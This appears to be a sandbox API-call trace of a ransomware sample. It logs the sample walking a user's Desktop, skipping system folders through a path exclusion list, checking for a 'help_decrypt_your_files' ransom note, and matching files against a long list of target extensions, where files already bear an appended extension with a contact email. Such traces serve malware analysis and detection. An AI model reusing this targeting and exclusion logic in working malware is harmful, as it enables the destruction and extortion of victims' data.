	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8631392c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8631392c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86339a21, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="m0zx pu6b880.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="M0ZXPU~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863d24bf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x863d24bf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x863f8878, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18420, dwReserved0=0x0, dwReserved1=0x0, cFileName="mj7pog-sftgg.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MJ7POG~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86444bd1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86444bd1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86444bd1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x93b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pulmow9bvn4haf5vv1.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PULMOW~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86491115, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86491115, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x864b728d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x8e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="r0lxgahtxvk ut.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="R0LXGA~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86529935, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86529935, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86529935, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="s9p-qsrx.pdf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="S9P-QS~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86576409, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86576409, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86576409, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x0, dwReserved1=0x0, cFileName="uyjb6plqkgwbr.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UYJB6P~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x865c2845, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x865c2845, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x865c2845, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x19e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v6h5tclb-hm.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="V6H5TC~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8660e825, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8660e825, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8663493a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="wictqbu5lb69gnf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WICTQB~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0xea2460e0, ftLastAccessTime.dwHighDateTime=0x1d9743d, ftLastWriteTime.dwLowDateTime=0xea2460e0, ftLastWriteTime.dwHighDateTime=0x1d9743d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XO5lwhfEXk", cAlternateFileName="XO5LWH~1")) returned 1
	[0183.494] lstrcmpW (lpString1="XO5lwhfEXk", lpString2="..") returned 1
	[0183.494] lstrcmpW (lpString1="XO5lwhfEXk", lpString2=".") returned 1
	[0183.494] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0183.494] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0183.494] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="XO5lwhfEXk" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk"
	[0183.494] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk"
	[0183.494] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.494] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.495] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*"
	[0183.495] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0xea2460e0, ftLastAccessTime.dwHighDateTime=0x1d9743d, ftLastWriteTime.dwLowDateTime=0xea2460e0, ftLastWriteTime.dwHighDateTime=0x1d9743d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0183.495] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*") returned 44
	[0183.495] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.495] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*") returned 0x2c
	[0183.495] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="windows") returned 0x0
	[0183.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="boot") returned 0x0
	[0183.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="system volume information") returned 0x0
	[0183.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.496] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="temp") returned 0x0
	[0183.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="program files") returned 0x0
	[0183.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.497] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.503] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="appdata") returned 0x0
	[0183.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.504] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="application data") returned 0x0
	[0183.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.504] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="winnt") returned 0x0
	[0183.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.504] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="tmp") returned 0x0
	[0183.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.504] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="cache") returned 0x0
	[0183.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.505] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.505] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="webcache") returned 0x0
	[0183.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.505] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="inetcache") returned 0x0
	[0183.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.505] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="nvidia") returned 0x0
	[0183.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.506] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="packages") returned 0x0
	[0183.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.506] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="cookies") returned 0x0
	[0183.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.506] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="programdata") returned 0x0
	[0183.506] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0xea2460e0, ftLastAccessTime.dwHighDateTime=0x1d9743d, ftLastWriteTime.dwLowDateTime=0xea2460e0, ftLastWriteTime.dwHighDateTime=0x1d9743d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.506] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376835f0, ftCreationTime.dwHighDateTime=0x1d975e4, ftLastAccessTime.dwLowDateTime=0x7ce974b0, ftLastAccessTime.dwHighDateTime=0x1d975e7, ftLastWriteTime.dwLowDateTime=0x7ce974b0, ftLastWriteTime.dwHighDateTime=0x1d975e7, nFileSizeHigh=0x0, nFileSizeLow=0x99e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-SRNRgSbo-CMJxI.mp4", cAlternateFileName="-SRNRG~1.MP4")) returned 1
	[0183.507] lstrcmpW (lpString1="-SRNRgSbo-CMJxI.mp4", lpString2="..") returned 1
	[0183.507] lstrcmpW (lpString1="-SRNRgSbo-CMJxI.mp4", lpString2=".") returned 1
	[0183.507] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.507] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="-SRNRgSbo-CMJxI.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\-SRNRgSbo-CMJxI.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\-SRNRgSbo-CMJxI.mp4"
	[0183.507] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\-SRNRgSbo-CMJxI.mp4") returned 60
	[0183.507] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.507] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\-SRNRgSbo-CMJxI.mp4", cchLength=0x3c | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4") returned 0x3c
	[0183.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.508] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.508] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4"
	[0183.508] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4") returned 60
	[0183.508] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.508] StrStrW (lpFirst=".mp4", lpSrch=".") returned=".mp4"
	[0183.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.509] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp4") returned=".mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.s